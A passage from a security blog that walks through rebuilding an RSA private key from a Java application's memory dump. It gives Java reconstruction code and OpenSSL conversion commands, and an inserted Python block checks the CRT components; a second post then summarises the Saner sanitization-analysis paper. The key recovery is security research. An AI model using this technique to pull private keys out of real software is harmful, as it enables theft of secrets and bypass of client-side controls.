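color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">openssl rsa -in recovered.pem -pubout -out recovered.pub</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">; </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">openssl rsa -in recovered.pem -check -noout</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> repeats the consistency test with OpenSSL's own checks. The explicit CRT checks matter because the JCE key factory will happily wrap mismatched components into a key object; a wrong word order or a missed sign would otherwise only show up as signatures that fail to verify.</span></div>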
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9wsLWZIkz_qQi3lvrX5TIlzfcIpgdAmHVZMV76D0KyASu8dnci0KN1IenRIVu0JeBhhqQOKAbXKt_u2buyoMXGSsK3NK90sg6xCrjwS7daqmKayEP0Hc0DzwoLiYALmr-rCyNu0O3fapW/s1600/individual-ints.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9wsLWZIkz_qQi3lvrX5TIlzfcIpgdAmHVZMV76D0KyASu8dnci0KN1IenRIVu0JeBhhqQOKAbXKt_u2buyoMXGSsK3NK90sg6xCrjwS7daqmKayEP0Hc0DzwoLiYALmr-rCyNu0O3fapW/s400/individual-ints.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;"> Image shows matching integers from the binary dump against MAT (Condition 1)
</span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh31p9Gj9Y23UATAT_PoLM8A459voFJc0QOtIvD8RXzRDdaERNFbmCvuaFwBFaNs3s3Cs49m6dRwGxokAh_9381q2tiY6JxK5f6mfgE7hDu94I3kcvime84scQAhyphenhyphenX_Y65LvScN0V1B-S1G/s1600/negative-values.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh31p9Gj9Y23UATAT_PoLM8A459voFJc0QOtIvD8RXzRDdaERNFbmCvuaFwBFaNs3s3Cs49m6dRwGxokAh_9381q2tiY6JxK5f6mfgE7hDu94I3kcvime84scQAhyphenhyphenX_Y65LvScN0V1B-S1G/s400/negative-values.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows the negative value (Condition 2)</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I searched around to identify the reason for the negative values, and the comments in the OpenJDK </span><a href="http://hg.openjdk.java.net/jdk6/jdk6/jdk/raw-file/2d585507a41b/src/share/classes/sun/security/rsa/RSAPrivateCrtKeyImpl.java" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">code</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> indicated that negative values can be the result of incorrect ASN.1 encoding. 
So I included the corresponding code to calculate and return the 2’s complement for negative </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> values before supplying them to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> constructor.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The final Java code that reads the binary </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger (int[])</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components from the file system and creates an </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PKCS8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> format is provided below.</span><br />
<br />
<br /></div>
<pre style="font-family:arial;font-size:12px;border:1px dashed #000000;width:99%;height:auto;overflow:auto;background:#d0d0d0;padding:0px;color:#000000;text-align:left;line-height:20px;"><code style="color:#000000;word-wrap:normal;">import java.io.DataInputStream;
import java.io.EOFException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.math.BigInteger;
import java.nio.ByteBuffer;
import java.nio.IntBuffer;
import java.security.KeyFactory;
import java.security.NoSuchAlgorithmException;
import java.security.NoSuchProviderException;
import java.security.PrivateKey;
import java.security.Security;
import java.security.spec.InvalidKeySpecException;
import java.security.spec.PKCS8EncodedKeySpec;
import java.security.spec.RSAPrivateCrtKeySpec;
import java.util.ArrayList;
import org.bouncycastle.jce.provider.BouncyCastleProvider;

public class GenerateKey {

    // Rebuilds a BigInteger from the int[] magnitude found in the memory dump. The ints are
    // written big-endian into a byte array, which is how the JVM lays out the mag[] words.
    public static BigInteger bigIntFromIntArray(int[] intArrayParam) {
        byte[] localByteArray = new byte[intArrayParam.length * 4];
        ByteBuffer byteBuffer = ByteBuffer.wrap(localByteArray);
        IntBuffer intBuffer = byteBuffer.asIntBuffer();
        intBuffer.put(intArrayParam);
        // new BigInteger(byte[]) reads the bytes as two's complement, so a leading byte >= 0x80
        // yields a negative value (Condition 2 above). The dumped words are an unsigned
        // magnitude, so re-read the very same bytes with signum +1 in that case.
        BigInteger bigInteger = new BigInteger(localByteArray);
        if (bigInteger.compareTo(BigInteger.ZERO) < 0)
            bigInteger = new BigInteger(1, localByteArray);
        return bigInteger;
    }

    // Reads one dumped component: a file of big-endian 32-bit ints, consumed until EOF.
    public static BigInteger bigIntegerFromBinaryFile(String filename) throws IOException {
        ArrayList<Integer> intArrayList = new ArrayList<Integer>();
        try (DataInputStream inputStream = new DataInputStream(new FileInputStream(filename))) {
            while (true)
                intArrayList.add(inputStream.readInt());
        } catch (EOFException ex) {
            // end of dump reached; everything read so far forms the magnitude
        }
        int[] intArray = new int[intArrayList.size()];
        for (int i = 0; i < intArrayList.size(); i++)
            intArray[i] = intArrayList.get(i);
        return bigIntFromIntArray(intArray);
    }

    public static void main(String[] args) throws NoSuchProviderException, NoSuchAlgorithmException,
            InvalidKeySpecException, IOException {
        Security.addProvider(new BouncyCastleProvider());
        // One binary file per RSA CRT component, as extracted from the dump.
        BigInteger crtCoefficient = bigIntegerFromBinaryFile("h:\\key-coeffs\\crtCoefficient");
        BigInteger modulus = bigIntegerFromBinaryFile("h:\\key-coeffs\\modulus");
        BigInteger primeExponentP = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeExponentP");
        BigInteger primeExponentQ = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeExponentQ");
        BigInteger primeP = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeP");
        BigInteger primeQ = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeQ");
        BigInteger privateExponent = bigIntegerFromBinaryFile("h:\\key-coeffs\\privateExponent");
        BigInteger publicExponent = bigIntegerFromBinaryFile("h:\\key-coeffs\\publicExponent");
        System.out.println("crtCoefficient\t" + crtCoefficient);
        System.out.println("modulus\t" + modulus);
        System.out.println("primeExponentP\t" + primeExponentP);
        System.out.println("primeExponentQ\t" + primeExponentQ);
        System.out.println("primeP\t" + primeP);
        System.out.println("primeQ\t" + primeQ);
        System.out.println("privateExponent\t" + privateExponent);
        System.out.println("publicExponent\t" + publicExponent);
        // Assemble the CRT key; the BouncyCastle factory validates the components.
        RSAPrivateCrtKeySpec spec = new RSAPrivateCrtKeySpec(modulus, publicExponent, privateExponent,
                primeP, primeQ, primeExponentP, primeExponentQ, crtCoefficient);
        KeyFactory factory = KeyFactory.getInstance("RSA", "BC");
        PrivateKey privateKey = factory.generatePrivate(spec);
        System.out.println(privateKey);
        // getEncoded() on an RSA private key already yields the PKCS#8 DER encoding.
        PKCS8EncodedKeySpec pkcs8EncodedKeySpec = new PKCS8EncodedKeySpec(privateKey.getEncoded());
        try (FileOutputStream fos = new FileOutputStream("h:\\key-coeffs\\private-pkcs8.der")) {
            fos.write(pkcs8EncodedKeySpec.getEncoded());
        }
    }
}
</code></pre><br /><br />
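<div dir="ltr" style="line-height: 1.15; margin-bottom: 10pt; margin-top: 0pt;">
As an added check that is not part of the original post, the Python below emulates the Java int[] to BigInteger step, reproducing the negative value that Condition 2 catches, and then validates the eight recovered components against the RSA CRT relationships before they are handed to any key factory. The toy key (P, Q, E) and the probe plaintext are constructed values, not taken from the dump described above.</div>

```python
# Added example (not the post's own code): emulates the Java int[] -> BigInteger step
# in pure Python and validates the recovered CRT components before they are handed to
# a key factory, so a mis-decoded component is caught by arithmetic, not by a stack trace.
from math import gcd

def ints_to_bytes(ints):
    # Java int[] laid out big-endian, 4 bytes per int, as ByteBuffer/IntBuffer does.
    return b"".join((i & 0xFFFFFFFF).to_bytes(4, "big") for i in ints)

def java_signed_big_int(ints):
    # Mirrors new BigInteger(byte[]): two's complement, so a leading byte >= 0x80 is negative.
    return int.from_bytes(ints_to_bytes(ints), "big", signed=True)

def unsigned_big_int(ints):
    # Mirrors new BigInteger(1, bytes): the same bytes read as a non-negative magnitude.
    return int.from_bytes(ints_to_bytes(ints), "big", signed=False)

def int_to_java_ints(value):
    # Inverse helper used to build constructed dumps: split into 32-bit big-endian words.
    n_words = max(1, (value.bit_length() + 31) // 32)
    return [(value >> (32 * k)) & 0xFFFFFFFF for k in reversed(range(n_words))]

def check_crt_components(n, e, d, p, q, dp, dq, qinv):
    """Return the names of the checks that fail; an empty list means the eight
    values form a consistent RSA CRT private key."""
    failures = []
    if any(x <= 0 for x in (n, e, d, p, q, dp, dq, qinv)):
        return ["positive"]          # the modular checks below assume positive operands
    if p * q != n:
        failures.append("n == p*q")
    lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)
    if (e * d) % lam != 1:
        failures.append("e*d == 1 mod lcm(p-1, q-1)")
    if dp != d % (p - 1):
        failures.append("dP == d mod (p-1)")
    if dq != d % (q - 1):
        failures.append("dQ == d mod (q-1)")
    if (q * qinv) % p != 1:
        failures.append("qInv == q^-1 mod p")
    m = 0x1234567                   # constructed plaintext for a round-trip check
    if pow(pow(m, e, n), d, n) != m % n:
        failures.append("encrypt/decrypt round trip")
    return failures

# Constructed toy key: real keys are 2048+ bits, but one 32-bit prime with its top bit
# set is enough to reproduce the sign problem. (Assumed values, not from the post.)
P = 2147483659   # smallest prime above 2**31; its int[] form is [0x8000000B]
Q = 2147483647   # 2**31 - 1, prime; int[] form [0x7FFFFFFF], decodes fine either way
E = 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))
DP, DQ, QINV = D % (P - 1), D % (Q - 1), pow(Q, -1, P)

def demo():
    """Decode primeP both ways and validate the key with each result."""
    p_dump = int_to_java_ints(P)                 # what the heap dump holds for primeP
    p_signed = java_signed_big_int(p_dump)       # new BigInteger(byte[]): negative
    p_fixed = unsigned_big_int(p_dump)           # new BigInteger(1, byte[]): correct
    bad = check_crt_components(N, E, D, p_signed, Q, DP, DQ, QINV)
    good = check_crt_components(N, E, D, p_fixed, Q, DP, DQ, QINV)
    return p_signed, p_fixed, bad, good

if __name__ == "__main__":
    print(demo())
```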
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Converting PKCS8 to PEM</span></span></h3>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The next step of the process was to convert the private key from </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PKCS8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> format to a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PEM</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> file and then to generate the public key from the private key with the following </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">OpenSSL</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> commands.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; 
font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="638"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="background-color: #d9d9d9; border: 1px solid #000000; padding: 0px 7px 0px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">openssl pkcs8 -inform DER -nocrypt -in private-pkcs8.der -out privatePem.pem</span></div>
<br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">openssl rsa -in privatePem.pem -pubout</span></div>
<br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
</tbody></table>
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhEBqqn7VWbNVRU6v12U4I52w1OMGt_8XGrOQLBhb6idhFurAHEzRTbv7IqdL_LDp-12s39T8uvp4slSlGeuoDGN-Z-7pSpITwotDg3tvEdmBYKvtiKxPoR6fu94PHzZDjsDaB3uvm5w4q/s1600/openss-converting-pkcs8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="27" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhEBqqn7VWbNVRU6v12U4I52w1OMGt_8XGrOQLBhb6idhFurAHEzRTbv7IqdL_LDp-12s39T8uvp4slSlGeuoDGN-Z-7pSpITwotDg3tvEdmBYKvtiKxPoR6fu94PHzZDjsDaB3uvm5w4q/s400/openss-converting-pkcs8.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows OpenSSL converting the PKCS8
</span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguhk2YZ-S0H_7dvCJv8XH3m6sjEaWy-3C1i15x7jOACA-fQKrf1f2tlDEanXpbZ5u09xSjvA8KolteK_5-BVXCSaRc7hbvIwI6C_07ROlpU-fVRKHTJPCo_Zd_pqRTVd-aI2LKEEDcF5Xn/s1600/rsa-key-extracted.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguhk2YZ-S0H_7dvCJv8XH3m6sjEaWy-3C1i15x7jOACA-fQKrf1f2tlDEanXpbZ5u09xSjvA8KolteK_5-BVXCSaRc7hbvIwI6C_07ROlpU-fVRKHTJPCo_Zd_pqRTVd-aI2LKEEDcF5Xn/s400/rsa-key-extracted.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows the RSA private key
</span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEF_UNm6l-HxSihtsEzVtOqWFmUtLU_givYVrezAcvqxV6y1hSE2JHWzprmOpaeQsXF3tpU2TrHa6AZC9ttqrp3Qg13GCjoslwLWikZ_byKaRBSCE4fAv8_E4NjS_X5O9HnFaHufmBAUpV/s1600/public-key-extracted.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEF_UNm6l-HxSihtsEzVtOqWFmUtLU_givYVrezAcvqxV6y1hSE2JHWzprmOpaeQsXF3tpU2TrHa6AZC9ttqrp3Qg13GCjoslwLWikZ_byKaRBSCE4fAv8_E4NjS_X5O9HnFaHufmBAUpV/s400/public-key-extracted.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;"> Image shows OpenSSL extracting public key from the privatePem.pem file</span></td></tr>
</tbody></table>
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Conclusion</span></span></h3>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Memory analysis is a powerful technique that can be used to identify and extract sensitive information from an application at runtime. In some scenarios, the extracted information can also be used to defeat client side security controls.</span></div>
<div>
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
Gursev Singh Kalra. Validating Custom Sanitization in Web Applications with Saner (published 2013-09-11, updated 2013-11-08)<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Calibri; font-size: large; font-weight: bold; line-height: 1.1500000000000001; white-space: pre-wrap;">Introduction</span><br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I recently read a </span><a href="http://www.cs.ucsb.edu/~chris/research/doc/oakland08_saner.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">paper</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in which the authors combined static and dynamic source code review techniques to evaluate the effectiveness of custom built data sanitization routines in PHP based web applications. The paper was very interesting and I thought I would summarize it for quick consumption.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The authors suggest that static analysis systems are not able to analyze custom sanitization routines and often report security vulnerabilities even when these routines effectively neutralize the malicious characters. The reported vulnerabilities (true or false positives) are typically subjected to manual analysis to determine the effectiveness of the custom code. This process is error-prone and often leads to inaccurate results, with false positives or false negatives.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As a part of their research, the authors wrote Saner with the objective of analyzing custom sanitization routines to identify XSS and SQL injection vulnerabilities in PHP based web applications. Saner combines static and dynamic analysis techniques, which resulted in low false positive rates and gave it the ability to identify the exact attack vectors that could bypass the custom sanitization code. It is based on Pixy, an open source web vulnerability scanner for PHP.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following figure shows the two phases used by Saner.</span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWp5KG5gUkqDsdEya5SNu2dlrlYH0xLoZh2JN_vTAdWI7rSLz5ty4VRk5zHvo9AlrR5bbHCVknLzXDgRcLgBNwmKMEHv3I0EKQ3PnaQnNt2NpS3k5Yl9h2yWiaqrr9LshWAlW7ol9hlTjw/s1600/saner-full-flow.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWp5KG5gUkqDsdEya5SNu2dlrlYH0xLoZh2JN_vTAdWI7rSLz5ty4VRk5zHvo9AlrR5bbHCVknLzXDgRcLgBNwmKMEHv3I0EKQ3PnaQnNt2NpS3k5Yl9h2yWiaqrr9LshWAlW7ol9hlTjw/s400/saner-full-flow.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Figure 1: Image shows the different stages of analysis performed by Saner</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Static Analysis</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">There are two types of static analysis models, sound and unsound. The sound model flags custom sanitization routines as ineffective, whereas the unsound model assumes that string manipulation operations on tainted input result in untainted output. The sound model can result in a large number of false positives and the unsound model may lead to false negatives.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Pixy provides data flow analysis between sources and sensitive sinks and identifies whether any built-in sanitization routines are applied on the identified data flow paths. Pixy follows the sound analysis model: it flags custom sanitization routines as ineffective, which results in high false positive rates. Additionally, program variables in Pixy can only be either tainted or untainted; Pixy cannot capture the set of values each variable can hold.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To address these shortcomings, Pixy was extended to derive an over-approximation of the values that program variables can hold at every point in the program. The extension uses finite state automata to describe an arbitrary set of strings and associates taint qualifiers with the automata transitions. This gives Saner the ability to track the taint status of different parts of a string.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Saner performs a postorder traversal of Pixy’s dependency graphs to derive the automata that describe the possible string values a program node can contain. A node can be a) a string, b) a variable or c) an operation. When a node represents a string literal, it is decorated with an automaton that describes the exact string. The automaton for a program variable is calculated from its successor nodes in the dependency graph.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Saner categorizes operations into two groups. The first group contains the functions that are precisely modeled, i.e. Saner uses finite state transducers to compute an automaton that describes all possible output strings of these functions. The Saner team developed a number of finite state transducers for custom string manipulation functions and also for the functions that are commonly used for input sanitization; this is required to precisely capture the effect of the sanitization routines. The second group consists of un-modeled functions, for which Saner depends on the values passed as parameters and computes the automaton based on the least upper bound of the taint status of the supplied parameters.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Saner uses Mohri and Sproat’s algorithm to model the functions. The automata used in Mohri and Sproat’s algorithm are not taint aware. To get around this limitation, the algorithm was left unmodified and a clever workaround was used to leverage the existing algorithm to propagate taint information. The workaround replaces static strings with empty ones, which ensures that static, untainted strings containing dangerous meta-characters do not lead to false positives. To compensate for the loss of information from the static string removal, an over-approximation of the possible string values is derived based on the modeled functions and the parameters they accept. This approach avoids false negatives.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Finally, in order to determine if a potentially malicious input makes it to a sensitive sink, an intersection is calculated between the automaton that represents the sink’s input and the automaton that contains the set of undesired characters. For every non-empty intersection, the source-sink pair is flagged as a potential true positive and the information is passed to the dynamic analysis phase.</span></div>
